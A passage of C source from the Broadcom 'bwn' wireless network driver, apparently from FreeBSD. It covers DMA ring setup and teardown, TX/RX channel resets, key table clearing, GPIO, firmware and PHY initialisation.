BWN_DMA_BIT_MASK(64)) return (BWN_DMA_64BIT); KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); return (BWN_DMA_30BIT); } static void bwn_pio_cancel_tx_packets(struct bwn_pio_txqueue *tq) { struct bwn_pio_txpkt *tp; unsigned int i; for (i = 0; i < N(tq->tq_pkts); i++) { tp = &(tq->tq_pkts[i]); if (tp->tp_m) { m_freem(tp->tp_m); tp->tp_m = NULL; } } } static uint16_t bwn_dma_base(int type, int controller_idx) { static const uint16_t map64[] = { BWN_DMA64_BASE0, BWN_DMA64_BASE1, BWN_DMA64_BASE2, BWN_DMA64_BASE3, BWN_DMA64_BASE4, BWN_DMA64_BASE5, }; static const uint16_t map32[] = { BWN_DMA32_BASE0, BWN_DMA32_BASE1, BWN_DMA32_BASE2, BWN_DMA32_BASE3, BWN_DMA32_BASE4, BWN_DMA32_BASE5, }; if (type == BWN_DMA_64BIT) { KASSERT(controller_idx >= 0 && controller_idx < N(map64), ("%s:%d: fail", __func__, __LINE__)); return (map64[controller_idx]); } KASSERT(controller_idx >= 0 && controller_idx < N(map32), ("%s:%d: fail", __func__, __LINE__)); return (map32[controller_idx]); } static void bwn_dma_init(struct bwn_mac *mac) { struct bwn_dma *dma = &mac->mac_method.dma; /* setup TX DMA channels. */ bwn_dma_setup(dma->wme[WME_AC_BK]); bwn_dma_setup(dma->wme[WME_AC_BE]); bwn_dma_setup(dma->wme[WME_AC_VI]); bwn_dma_setup(dma->wme[WME_AC_VO]); bwn_dma_setup(dma->mcast); /* setup RX DMA channel. */ bwn_dma_setup(dma->rx); } static struct bwn_dma_ring * bwn_dma_ringsetup(struct bwn_mac *mac, int controller_index, int for_tx, int type) { struct bwn_dma *dma = &mac->mac_method.dma; struct bwn_dma_ring *dr; struct bwn_dmadesc_generic *desc; struct bwn_dmadesc_meta *mt; struct bwn_softc *sc = mac->mac_sc; int error, i; dr = malloc(sizeof(*dr), M_DEVBUF, M_NOWAIT | M_ZERO); if (dr == NULL) goto out; dr->dr_numslots = BWN_RXRING_SLOTS; if (for_tx) dr->dr_numslots = BWN_TXRING_SLOTS; dr->dr_meta = malloc(dr->dr_numslots * sizeof(struct bwn_dmadesc_meta), M_DEVBUF, M_NOWAIT | M_ZERO); if (dr->dr_meta == NULL) goto fail0; dr->dr_type = type; dr->dr_mac = mac; dr->dr_base = bwn_dma_base(type, controller_index); dr->dr_index = controller_index; if (type == BWN_DMA_64BIT) { dr->getdesc = bwn_dma_64_getdesc; dr->setdesc = bwn_dma_64_setdesc; dr->start_transfer = bwn_dma_64_start_transfer; dr->suspend = bwn_dma_64_suspend; dr->resume = bwn_dma_64_resume; dr->get_curslot = bwn_dma_64_get_curslot; dr->set_curslot = bwn_dma_64_set_curslot; } else { dr->getdesc = bwn_dma_32_getdesc; dr->setdesc = bwn_dma_32_setdesc; dr->start_transfer = bwn_dma_32_start_transfer; dr->suspend = bwn_dma_32_suspend; dr->resume = bwn_dma_32_resume; dr->get_curslot = bwn_dma_32_get_curslot; dr->set_curslot = bwn_dma_32_set_curslot; } if (for_tx) { dr->dr_tx = 1; dr->dr_curslot = -1; } else { if (dr->dr_index == 0) { dr->dr_rx_bufsize = BWN_DMA0_RX_BUFFERSIZE; dr->dr_frameoffset = BWN_DMA0_RX_FRAMEOFFSET; } else KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); } error = bwn_dma_allocringmemory(dr); if (error) goto fail2; if (for_tx) { /* * Assumption: BWN_TXRING_SLOTS can be divided by * BWN_TX_SLOTS_PER_FRAME */ KASSERT(BWN_TXRING_SLOTS % BWN_TX_SLOTS_PER_FRAME == 0, ("%s:%d: fail", __func__, __LINE__)); dr->dr_txhdr_cache = malloc((dr->dr_numslots / BWN_TX_SLOTS_PER_FRAME) * BWN_HDRSIZE(mac), M_DEVBUF, M_NOWAIT | M_ZERO); KASSERT(dr->dr_txhdr_cache != NULL, ("%s:%d: fail", __func__, __LINE__)); /* * Create TX ring DMA stuffs */ error = bus_dma_tag_create(dma->parent_dtag, BWN_ALIGN, 0, BUS_SPACE_MAXADDR, BUS_SPACE_MAXADDR, NULL, NULL, BWN_HDRSIZE(mac), 1, BUS_SPACE_MAXSIZE_32BIT, 0, NULL, NULL, &dr->dr_txring_dtag); if (error) { 
device_printf(sc->sc_dev, "can't create TX ring DMA tag: TODO frees\n"); goto fail1; } for (i = 0; i < dr->dr_numslots; i += 2) { dr->getdesc(dr, i, &desc, &mt); mt->mt_txtype = BWN_DMADESC_METATYPE_HEADER; mt->mt_m = NULL; mt->mt_ni = NULL; mt->mt_islast = 0; error = bus_dmamap_create(dr->dr_txring_dtag, 0, &mt->mt_dmap); if (error) { device_printf(sc->sc_dev, "can't create RX buf DMA map\n"); goto fail1; } dr->getdesc(dr, i + 1, &desc, &mt); mt->mt_txtype = BWN_DMADESC_METATYPE_BODY; mt->mt_m = NULL; mt->mt_ni = NULL; mt->mt_islast = 1; error = bus_dmamap_create(dma->txbuf_dtag, 0, &mt->mt_dmap); if (error) { device_printf(sc->sc_dev, "can't create RX buf DMA map\n"); goto fail1; } } } else { error = bus_dmamap_create(dma->rxbuf_dtag, 0, &dr->dr_spare_dmap); if (error) { device_printf(sc->sc_dev, "can't create RX buf DMA map\n"); goto out; /* XXX wrong! */ } for (i = 0; i < dr->dr_numslots; i++) { dr->getdesc(dr, i, &desc, &mt); error = bus_dmamap_create(dma->rxbuf_dtag, 0, &mt->mt_dmap); if (error) { device_printf(sc->sc_dev, "can't create RX buf DMA map\n"); goto out; /* XXX wrong! */ } error = bwn_dma_newbuf(dr, desc, mt, 1); if (error) { device_printf(sc->sc_dev, "failed to allocate RX buf\n"); goto out; /* XXX wrong! */ } } bus_dmamap_sync(dr->dr_ring_dtag, dr->dr_ring_dmap, BUS_DMASYNC_PREWRITE); dr->dr_usedslot = dr->dr_numslots; } out: return (dr); fail2: free(dr->dr_txhdr_cache, M_DEVBUF); fail1: free(dr->dr_meta, M_DEVBUF); fail0: free(dr, M_DEVBUF); return (NULL); } static void bwn_dma_ringfree(struct bwn_dma_ring **dr) { if (dr == NULL) return; bwn_dma_free_descbufs(*dr); bwn_dma_free_ringmemory(*dr); free((*dr)->dr_txhdr_cache, M_DEVBUF); free((*dr)->dr_meta, M_DEVBUF); free(*dr, M_DEVBUF); *dr = NULL; } static void bwn_dma_32_getdesc(struct bwn_dma_ring *dr, int slot, struct bwn_dmadesc_generic **gdesc, struct bwn_dmadesc_meta **meta) { struct bwn_dmadesc32 *desc; *meta = &(dr->dr_meta[slot]); desc = dr->dr_ring_descbase; desc = &(desc[slot]); *gdesc = (struct bwn_dmadesc_generic *)desc; } static void bwn_dma_32_setdesc(struct bwn_dma_ring *dr, struct bwn_dmadesc_generic *desc, bus_addr_t dmaaddr, uint16_t bufsize, int start, int end, int irq) { struct bwn_dmadesc32 *descbase = dr->dr_ring_descbase; struct bwn_softc *sc = dr->dr_mac->mac_sc; uint32_t addr, addrext, ctl; int slot; slot = (int)(&(desc->dma.dma32) - descbase); KASSERT(slot >= 0 && slot < dr->dr_numslots, ("%s:%d: fail", __func__, __LINE__)); addr = (uint32_t) (dmaaddr & ~SIBA_DMA_TRANSLATION_MASK); addrext = (uint32_t) (dmaaddr & SIBA_DMA_TRANSLATION_MASK) >> 30; addr |= siba_dma_translation(sc->sc_dev); ctl = bufsize & BWN_DMA32_DCTL_BYTECNT; if (slot == dr->dr_numslots - 1) ctl |= BWN_DMA32_DCTL_DTABLEEND; if (start) ctl |= BWN_DMA32_DCTL_FRAMESTART; if (end) ctl |= BWN_DMA32_DCTL_FRAMEEND; if (irq) ctl |= BWN_DMA32_DCTL_IRQ; ctl |= (addrext << BWN_DMA32_DCTL_ADDREXT_SHIFT) & BWN_DMA32_DCTL_ADDREXT_MASK; desc->dma.dma32.control = htole32(ctl); desc->dma.dma32.address = htole32(addr); } static void bwn_dma_32_start_transfer(struct bwn_dma_ring *dr, int slot) { BWN_DMA_WRITE(dr, BWN_DMA32_TXINDEX, (uint32_t)(slot * sizeof(struct bwn_dmadesc32))); } static void bwn_dma_32_suspend(struct bwn_dma_ring *dr) { BWN_DMA_WRITE(dr, BWN_DMA32_TXCTL, BWN_DMA_READ(dr, BWN_DMA32_TXCTL) | BWN_DMA32_TXSUSPEND); } static void bwn_dma_32_resume(struct bwn_dma_ring *dr) { BWN_DMA_WRITE(dr, BWN_DMA32_TXCTL, BWN_DMA_READ(dr, BWN_DMA32_TXCTL) & ~BWN_DMA32_TXSUSPEND); } static int bwn_dma_32_get_curslot(struct bwn_dma_ring *dr) { 
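/* Read the 32-bit DMA RX status register and turn the descriptor pointer (a byte offset into the ring) into a slot index. */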
uint32_t val; val = BWN_DMA_READ(dr, BWN_DMA32_RXSTATUS); val &= BWN_DMA32_RXDPTR; return (val / sizeof(struct bwn_dmadesc32)); } static void bwn_dma_32_set_curslot(struct bwn_dma_ring *dr, int slot) { BWN_DMA_WRITE(dr, BWN_DMA32_RXINDEX, (uint32_t) (slot * sizeof(struct bwn_dmadesc32))); } static void bwn_dma_64_getdesc(struct bwn_dma_ring *dr, int slot, struct bwn_dmadesc_generic **gdesc, struct bwn_dmadesc_meta **meta) { struct bwn_dmadesc64 *desc; *meta = &(dr->dr_meta[slot]); desc = dr->dr_ring_descbase; desc = &(desc[slot]); *gdesc = (struct bwn_dmadesc_generic *)desc; } static void bwn_dma_64_setdesc(struct bwn_dma_ring *dr, struct bwn_dmadesc_generic *desc, bus_addr_t dmaaddr, uint16_t bufsize, int start, int end, int irq) { struct bwn_dmadesc64 *descbase = dr->dr_ring_descbase; struct bwn_softc *sc = dr->dr_mac->mac_sc; int slot; uint32_t ctl0 = 0, ctl1 = 0; uint32_t addrlo, addrhi; uint32_t addrext; slot = (int)(&(desc->dma.dma64) - descbase); KASSERT(slot >= 0 && slot < dr->dr_numslots, ("%s:%d: fail", __func__, __LINE__)); addrlo = (uint32_t) (dmaaddr & 0xffffffff); addrhi = (((uint64_t) dmaaddr >> 32) & ~SIBA_DMA_TRANSLATION_MASK); addrext = (((uint64_t) dmaaddr >> 32) & SIBA_DMA_TRANSLATION_MASK) >> 30; addrhi |= (siba_dma_translation(sc->sc_dev) << 1); if (slot == dr->dr_numslots - 1) ctl0 |= BWN_DMA64_DCTL0_DTABLEEND; if (start) ctl0 |= BWN_DMA64_DCTL0_FRAMESTART; if (end) ctl0 |= BWN_DMA64_DCTL0_FRAMEEND; if (irq) ctl0 |= BWN_DMA64_DCTL0_IRQ; ctl1 |= bufsize & BWN_DMA64_DCTL1_BYTECNT; ctl1 |= (addrext << BWN_DMA64_DCTL1_ADDREXT_SHIFT) & BWN_DMA64_DCTL1_ADDREXT_MASK; desc->dma.dma64.control0 = htole32(ctl0); desc->dma.dma64.control1 = htole32(ctl1); desc->dma.dma64.address_low = htole32(addrlo); desc->dma.dma64.address_high = htole32(addrhi); } static void bwn_dma_64_start_transfer(struct bwn_dma_ring *dr, int slot) { BWN_DMA_WRITE(dr, BWN_DMA64_TXINDEX, (uint32_t)(slot * sizeof(struct bwn_dmadesc64))); } static void bwn_dma_64_suspend(struct bwn_dma_ring *dr) { BWN_DMA_WRITE(dr, BWN_DMA64_TXCTL, BWN_DMA_READ(dr, BWN_DMA64_TXCTL) | BWN_DMA64_TXSUSPEND); } static void bwn_dma_64_resume(struct bwn_dma_ring *dr) { BWN_DMA_WRITE(dr, BWN_DMA64_TXCTL, BWN_DMA_READ(dr, BWN_DMA64_TXCTL) & ~BWN_DMA64_TXSUSPEND); } static int bwn_dma_64_get_curslot(struct bwn_dma_ring *dr) { uint32_t val; val = BWN_DMA_READ(dr, BWN_DMA64_RXSTATUS); val &= BWN_DMA64_RXSTATDPTR; return (val / sizeof(struct bwn_dmadesc64)); } static void bwn_dma_64_set_curslot(struct bwn_dma_ring *dr, int slot) { BWN_DMA_WRITE(dr, BWN_DMA64_RXINDEX, (uint32_t)(slot * sizeof(struct bwn_dmadesc64))); } static int bwn_dma_allocringmemory(struct bwn_dma_ring *dr) { struct bwn_mac *mac = dr->dr_mac; struct bwn_dma *dma = &mac->mac_method.dma; struct bwn_softc *sc = mac->mac_sc; int error; error = bus_dma_tag_create(dma->parent_dtag, BWN_ALIGN, 0, BUS_SPACE_MAXADDR, BUS_SPACE_MAXADDR, NULL, NULL, BWN_DMA_RINGMEMSIZE, 1, BUS_SPACE_MAXSIZE_32BIT, 0, NULL, NULL, &dr->dr_ring_dtag); if (error) { device_printf(sc->sc_dev, "can't create TX ring DMA tag: TODO frees\n"); return (-1); } error = bus_dmamem_alloc(dr->dr_ring_dtag, &dr->dr_ring_descbase, BUS_DMA_WAITOK | BUS_DMA_ZERO, &dr->dr_ring_dmap); if (error) { device_printf(sc->sc_dev, "can't allocate DMA mem: TODO frees\n"); return (-1); } error = bus_dmamap_load(dr->dr_ring_dtag, dr->dr_ring_dmap, dr->dr_ring_descbase, BWN_DMA_RINGMEMSIZE, bwn_dma_ring_addr, &dr->dr_ring_dmabase, BUS_DMA_NOWAIT); if (error) { device_printf(sc->sc_dev, "can't load DMA mem: TODO free\n"); return 
(-1); } return (0); } static void bwn_dma_setup(struct bwn_dma_ring *dr) { struct bwn_softc *sc = dr->dr_mac->mac_sc; uint64_t ring64; uint32_t addrext, ring32, value; uint32_t trans = siba_dma_translation(sc->sc_dev); if (dr->dr_tx) { dr->dr_curslot = -1; if (dr->dr_type == BWN_DMA_64BIT) { ring64 = (uint64_t)(dr->dr_ring_dmabase); addrext = ((ring64 >> 32) & SIBA_DMA_TRANSLATION_MASK) >> 30; value = BWN_DMA64_TXENABLE; value |= (addrext << BWN_DMA64_TXADDREXT_SHIFT) & BWN_DMA64_TXADDREXT_MASK; BWN_DMA_WRITE(dr, BWN_DMA64_TXCTL, value); BWN_DMA_WRITE(dr, BWN_DMA64_TXRINGLO, (ring64 & 0xffffffff)); BWN_DMA_WRITE(dr, BWN_DMA64_TXRINGHI, ((ring64 >> 32) & ~SIBA_DMA_TRANSLATION_MASK) | (trans << 1)); } else { ring32 = (uint32_t)(dr->dr_ring_dmabase); addrext = (ring32 & SIBA_DMA_TRANSLATION_MASK) >> 30; value = BWN_DMA32_TXENABLE; value |= (addrext << BWN_DMA32_TXADDREXT_SHIFT) & BWN_DMA32_TXADDREXT_MASK; BWN_DMA_WRITE(dr, BWN_DMA32_TXCTL, value); BWN_DMA_WRITE(dr, BWN_DMA32_TXRING, (ring32 & ~SIBA_DMA_TRANSLATION_MASK) | trans); } return; } /* * set for RX */ dr->dr_usedslot = dr->dr_numslots; if (dr->dr_type == BWN_DMA_64BIT) { ring64 = (uint64_t)(dr->dr_ring_dmabase); addrext = ((ring64 >> 32) & SIBA_DMA_TRANSLATION_MASK) >> 30; value = (dr->dr_frameoffset << BWN_DMA64_RXFROFF_SHIFT); value |= BWN_DMA64_RXENABLE; value |= (addrext << BWN_DMA64_RXADDREXT_SHIFT) & BWN_DMA64_RXADDREXT_MASK; BWN_DMA_WRITE(dr, BWN_DMA64_RXCTL, value); BWN_DMA_WRITE(dr, BWN_DMA64_RXRINGLO, (ring64 & 0xffffffff)); BWN_DMA_WRITE(dr, BWN_DMA64_RXRINGHI, ((ring64 >> 32) & ~SIBA_DMA_TRANSLATION_MASK) | (trans << 1)); BWN_DMA_WRITE(dr, BWN_DMA64_RXINDEX, dr->dr_numslots * sizeof(struct bwn_dmadesc64)); } else { ring32 = (uint32_t)(dr->dr_ring_dmabase); addrext = (ring32 & SIBA_DMA_TRANSLATION_MASK) >> 30; value = (dr->dr_frameoffset << BWN_DMA32_RXFROFF_SHIFT); value |= BWN_DMA32_RXENABLE; value |= (addrext << BWN_DMA32_RXADDREXT_SHIFT) & BWN_DMA32_RXADDREXT_MASK; BWN_DMA_WRITE(dr, BWN_DMA32_RXCTL, value); BWN_DMA_WRITE(dr, BWN_DMA32_RXRING, (ring32 & ~SIBA_DMA_TRANSLATION_MASK) | trans); BWN_DMA_WRITE(dr, BWN_DMA32_RXINDEX, dr->dr_numslots * sizeof(struct bwn_dmadesc32)); } } static void bwn_dma_free_ringmemory(struct bwn_dma_ring *dr) { bus_dmamap_unload(dr->dr_ring_dtag, dr->dr_ring_dmap); bus_dmamem_free(dr->dr_ring_dtag, dr->dr_ring_descbase, dr->dr_ring_dmap); } static void bwn_dma_cleanup(struct bwn_dma_ring *dr) { if (dr->dr_tx) { bwn_dma_tx_reset(dr->dr_mac, dr->dr_base, dr->dr_type); if (dr->dr_type == BWN_DMA_64BIT) { BWN_DMA_WRITE(dr, BWN_DMA64_TXRINGLO, 0); BWN_DMA_WRITE(dr, BWN_DMA64_TXRINGHI, 0); } else BWN_DMA_WRITE(dr, BWN_DMA32_TXRING, 0); } else { bwn_dma_rx_reset(dr->dr_mac, dr->dr_base, dr->dr_type); if (dr->dr_type == BWN_DMA_64BIT) { BWN_DMA_WRITE(dr, BWN_DMA64_RXRINGLO, 0); BWN_DMA_WRITE(dr, BWN_DMA64_RXRINGHI, 0); } else BWN_DMA_WRITE(dr, BWN_DMA32_RXRING, 0); } } static void bwn_dma_free_descbufs(struct bwn_dma_ring *dr) { struct bwn_dmadesc_generic *desc; struct bwn_dmadesc_meta *meta; struct bwn_mac *mac = dr->dr_mac; struct bwn_dma *dma = &mac->mac_method.dma; struct bwn_softc *sc = mac->mac_sc; int i; if (!dr->dr_usedslot) return; for (i = 0; i < dr->dr_numslots; i++) { dr->getdesc(dr, i, &desc, &meta); if (meta->mt_m == NULL) { if (!dr->dr_tx) device_printf(sc->sc_dev, "%s: not TX?\n", __func__); continue; } if (dr->dr_tx) { if (meta->mt_txtype == BWN_DMADESC_METATYPE_HEADER) bus_dmamap_unload(dr->dr_txring_dtag, meta->mt_dmap); else if (meta->mt_txtype == BWN_DMADESC_METATYPE_BODY) 
bus_dmamap_unload(dma->txbuf_dtag, meta->mt_dmap); } else bus_dmamap_unload(dma->rxbuf_dtag, meta->mt_dmap); bwn_dma_free_descbuf(dr, meta); } } static int bwn_dma_tx_reset(struct bwn_mac *mac, uint16_t base, int type) { struct bwn_softc *sc = mac->mac_sc; uint32_t value; int i; uint16_t offset; for (i = 0; i < 10; i++) { offset = (type == BWN_DMA_64BIT) ? BWN_DMA64_TXSTATUS : BWN_DMA32_TXSTATUS; value = BWN_READ_4(mac, base + offset); if (type == BWN_DMA_64BIT) { value &= BWN_DMA64_TXSTAT; if (value == BWN_DMA64_TXSTAT_DISABLED || value == BWN_DMA64_TXSTAT_IDLEWAIT || value == BWN_DMA64_TXSTAT_STOPPED) break; } else { value &= BWN_DMA32_TXSTATE; if (value == BWN_DMA32_TXSTAT_DISABLED || value == BWN_DMA32_TXSTAT_IDLEWAIT || value == BWN_DMA32_TXSTAT_STOPPED) break; } DELAY(1000); } offset = (type == BWN_DMA_64BIT) ? BWN_DMA64_TXCTL : BWN_DMA32_TXCTL; BWN_WRITE_4(mac, base + offset, 0); for (i = 0; i < 10; i++) { offset = (type == BWN_DMA_64BIT) ? BWN_DMA64_TXSTATUS : BWN_DMA32_TXSTATUS; value = BWN_READ_4(mac, base + offset); if (type == BWN_DMA_64BIT) { value &= BWN_DMA64_TXSTAT; if (value == BWN_DMA64_TXSTAT_DISABLED) { i = -1; break; } } else { value &= BWN_DMA32_TXSTATE; if (value == BWN_DMA32_TXSTAT_DISABLED) { i = -1; break; } } DELAY(1000); } if (i != -1) { device_printf(sc->sc_dev, "%s: timed out\n", __func__); return (ENODEV); } DELAY(1000); return (0); } static int bwn_dma_rx_reset(struct bwn_mac *mac, uint16_t base, int type) { struct bwn_softc *sc = mac->mac_sc; uint32_t value; int i; uint16_t offset; offset = (type == BWN_DMA_64BIT) ? BWN_DMA64_RXCTL : BWN_DMA32_RXCTL; BWN_WRITE_4(mac, base + offset, 0); for (i = 0; i < 10; i++) { offset = (type == BWN_DMA_64BIT) ? BWN_DMA64_RXSTATUS : BWN_DMA32_RXSTATUS; value = BWN_READ_4(mac, base + offset); if (type == BWN_DMA_64BIT) { value &= BWN_DMA64_RXSTAT; if (value == BWN_DMA64_RXSTAT_DISABLED) { i = -1; break; } } else { value &= BWN_DMA32_RXSTATE; if (value == BWN_DMA32_RXSTAT_DISABLED) { i = -1; break; } } DELAY(1000); } if (i != -1) { device_printf(sc->sc_dev, "%s: timed out\n", __func__); return (ENODEV); } return (0); } static void bwn_dma_free_descbuf(struct bwn_dma_ring *dr, struct bwn_dmadesc_meta *meta) { if (meta->mt_m != NULL) { m_freem(meta->mt_m); meta->mt_m = NULL; } if (meta->mt_ni != NULL) { ieee80211_free_node(meta->mt_ni); meta->mt_ni = NULL; } } static void bwn_dma_set_redzone(struct bwn_dma_ring *dr, struct mbuf *m) { struct bwn_rxhdr4 *rxhdr; unsigned char *frame; rxhdr = mtod(m, struct bwn_rxhdr4 *); rxhdr->frame_len = 0; KASSERT(dr->dr_rx_bufsize >= dr->dr_frameoffset + sizeof(struct bwn_plcp6) + 2, ("%s:%d: fail", __func__, __LINE__)); frame = mtod(m, char *) + dr->dr_frameoffset; memset(frame, 0xff, sizeof(struct bwn_plcp6) + 2 /* padding */); } static uint8_t bwn_dma_check_redzone(struct bwn_dma_ring *dr, struct mbuf *m) { unsigned char *f = mtod(m, char *) + dr->dr_frameoffset; return ((f[0] & f[1] & f[2] & f[3] & f[4] & f[5] & f[6] & f[7]) == 0xff); } static void bwn_wme_init(struct bwn_mac *mac) { bwn_wme_load(mac); /* enable WME support. */ bwn_hf_write(mac, bwn_hf_read(mac) | BWN_HF_EDCF); BWN_WRITE_2(mac, BWN_IFSCTL, BWN_READ_2(mac, BWN_IFSCTL) | BWN_IFSCTL_USE_EDCF); } static void bwn_spu_setdelay(struct bwn_mac *mac, int idle) { struct bwn_softc *sc = mac->mac_sc; struct ieee80211com *ic = sc->sc_ifp->if_l2com; uint16_t delay; /* microsec */ delay = (mac->mac_phy.type == BWN_PHYTYPE_A) ? 
3700 : 1050; if (ic->ic_opmode == IEEE80211_M_IBSS || idle) delay = 500; if ((mac->mac_phy.rf_ver == 0x2050) && (mac->mac_phy.rf_rev == 8)) delay = max(delay, (uint16_t)2400); bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_SPU_WAKEUP, delay); } static void bwn_bt_enable(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; uint64_t hf; if (bwn_bluetooth == 0) return; if ((siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_BTCOEXIST) == 0) return; if (mac->mac_phy.type != BWN_PHYTYPE_B && !mac->mac_phy.gmode) return; hf = bwn_hf_read(mac); if (siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_BTCMOD) hf |= BWN_HF_BT_COEXISTALT; else hf |= BWN_HF_BT_COEXIST; bwn_hf_write(mac, hf); } static void bwn_set_macaddr(struct bwn_mac *mac) { bwn_mac_write_bssid(mac); bwn_mac_setfilter(mac, BWN_MACFILTER_SELF, mac->mac_sc->sc_macaddr); } static void bwn_clear_keys(struct bwn_mac *mac) { int i; for (i = 0; i < mac->mac_max_nr_keys; i++) { KASSERT(i >= 0 && i < mac->mac_max_nr_keys, ("%s:%d: fail", __func__, __LINE__)); bwn_key_dowrite(mac, i, BWN_SEC_ALGO_NONE, NULL, BWN_SEC_KEYSIZE, NULL); if ((i <= 3) && !BWN_SEC_NEWAPI(mac)) { bwn_key_dowrite(mac, i + 4, BWN_SEC_ALGO_NONE, NULL, BWN_SEC_KEYSIZE, NULL); } mac->mac_key[i].keyconf = NULL; } } static void bwn_crypt_init(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; mac->mac_max_nr_keys = (siba_get_revid(sc->sc_dev) >= 5) ? 58 : 20; KASSERT(mac->mac_max_nr_keys <= N(mac->mac_key), ("%s:%d: fail", __func__, __LINE__)); mac->mac_ktp = bwn_shm_read_2(mac, BWN_SHARED, BWN_SHARED_KEY_TABLEP); mac->mac_ktp *= 2; if (siba_get_revid(sc->sc_dev) >= 5) BWN_WRITE_2(mac, BWN_RCMTA_COUNT, mac->mac_max_nr_keys - 8); bwn_clear_keys(mac); } static void bwn_chip_exit(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; bwn_phy_exit(mac); siba_gpio_set(sc->sc_dev, 0); } static int bwn_fw_fillinfo(struct bwn_mac *mac) { int error; error = bwn_fw_gets(mac, BWN_FWTYPE_DEFAULT); if (error == 0) return (0); error = bwn_fw_gets(mac, BWN_FWTYPE_OPENSOURCE); if (error == 0) return (0); return (error); } static int bwn_gpio_init(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; uint32_t mask = 0x1f, set = 0xf, value; BWN_WRITE_4(mac, BWN_MACCTL, BWN_READ_4(mac, BWN_MACCTL) & ~BWN_MACCTL_GPOUT_MASK); BWN_WRITE_2(mac, BWN_GPIO_MASK, BWN_READ_2(mac, BWN_GPIO_MASK) | 0x000f); if (siba_get_chipid(sc->sc_dev) == 0x4301) { mask |= 0x0060; set |= 0x0060; } if (siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_PACTRL) { BWN_WRITE_2(mac, BWN_GPIO_MASK, BWN_READ_2(mac, BWN_GPIO_MASK) | 0x0200); mask |= 0x0200; set |= 0x0200; } if (siba_get_revid(sc->sc_dev) >= 2) mask |= 0x0010; value = siba_gpio_get(sc->sc_dev); if (value == -1) return (0); siba_gpio_set(sc->sc_dev, (value & mask) | set); return (0); } static int bwn_fw_loadinitvals(struct bwn_mac *mac) { #define GETFWOFFSET(fwp, offset) \ ((const struct bwn_fwinitvals *)((const char *)fwp.fw->data + offset)) const size_t hdr_len = sizeof(struct bwn_fwhdr); const struct bwn_fwhdr *hdr; struct bwn_fw *fw = &mac->mac_fw; int error; hdr = (const struct bwn_fwhdr *)(fw->initvals.fw->data); error = bwn_fwinitvals_write(mac, GETFWOFFSET(fw->initvals, hdr_len), be32toh(hdr->size), fw->initvals.fw->datasize - hdr_len); if (error) return (error); if (fw->initvals_band.fw) { hdr = (const struct bwn_fwhdr *)(fw->initvals_band.fw->data); error = bwn_fwinitvals_write(mac, GETFWOFFSET(fw->initvals_band, hdr_len), be32toh(hdr->size), fw->initvals_band.fw->datasize - hdr_len); } return (error); #undef GETFWOFFSET } static int bwn_phy_init(struct 
bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; int error; mac->mac_phy.chan = mac->mac_phy.get_default_chan(mac); mac->mac_phy.rf_onoff(mac, 1); error = mac->mac_phy.init(mac); if (error) { device_printf(sc->sc_dev, "PHY init failed\n"); goto fail0; } error = bwn_switch_channel(mac, mac->mac_phy.get_default_chan(mac)); if (error) { device_printf(sc->sc_dev, "failed to switch default channel\n"); goto fail1; } return (0); fail1: if (mac->mac_phy.exit) mac->mac_phy.exit(mac); fail0: mac->mac_phy.rf_onoff(mac, 0); return (error); } static void bwn_set_txantenna(struct bwn_mac *mac, int antenna) { uint16_t ant; uint16_t tmp; ant = bwn_ant2phy(antenna); /* For ACK/CTS */ tmp = bwn_shm_read_2(mac, BWN_SHARED, BWN_SHARED_ACKCTS_PHYCTL); tmp = (tmp & ~BWN_TX_PHY_ANT) | ant; bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_ACKCTS_PHYCTL, tmp); /* For Probe Responses */ tmp = bwn_shm_read_2(mac, BWN_SHARED, BWN_SHARED_PROBE_RESP_PHYCTL); tmp = (tmp & ~BWN_TX_PHY_ANT) | ant; bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_PROBE_RESP_PHYCTL, tmp); } static void bwn_set_opmode(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t ctl; uint16_t cfp_pretbtt; ctl = BWN_READ_4(mac, BWN_MACCTL); ctl &= ~(BWN_MACCTL_HOSTAP | BWN_MACCTL_PASS_CTL | BWN_MACCTL_PASS_BADPLCP | BWN_MACCTL_PASS_BADFCS | BWN_MACCTL_PROMISC | BWN_MACCTL_BEACON_PROMISC); ctl |= BWN_MACCTL_STA; if (ic->ic_opmode == IEEE80211_M_HOSTAP || ic->ic_opmode == IEEE80211_M_MBSS) ctl |= BWN_MACCTL_HOSTAP; else if (ic->ic_opmode == IEEE80211_M_IBSS) ctl &= ~BWN_MACCTL_STA; ctl |= sc->sc_filters; if (siba_get_revid(sc->sc_dev) <= 4) ctl |= BWN_MACCTL_PROMISC; BWN_WRITE_4(mac, BWN_MACCTL, ctl); cfp_pretbtt = 2; if ((ctl & BWN_MACCTL_STA) && !(ctl & BWN_MACCTL_HOSTAP)) { if (siba_get_chipid(sc->sc_dev) == 0x4306 && siba_get_chiprev(sc->sc_dev) == 3) cfp_pretbtt = 100; else cfp_pretbtt = 50; } BWN_WRITE_2(mac, 0x612, cfp_pretbtt); } static int bwn_dma_gettype(struct bwn_mac *mac) { uint32_t tmp; uint16_t base; tmp = BWN_READ_4(mac, SIBA_TGSHIGH); if (tmp & SIBA_TGSHIGH_DMA64) return (BWN_DMA_64BIT); base = bwn_dma_base(0, 0); BWN_WRITE_4(mac, base + BWN_DMA32_TXCTL, BWN_DMA32_TXADDREXT_MASK); tmp = BWN_READ_4(mac, base + BWN_DMA32_TXCTL); if (tmp & BWN_DMA32_TXADDREXT_MASK) return (BWN_DMA_32BIT); return (BWN_DMA_30BIT); } static void bwn_dma_ring_addr(void *arg, bus_dma_segment_t *seg, int nseg, int error) { if (!error) { KASSERT(nseg == 1, ("too many segments(%d)\n", nseg)); *((bus_addr_t *)arg) = seg->ds_addr; } } static void bwn_phy_g_init_sub(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_softc *sc = mac->mac_sc; uint16_t i, tmp; if 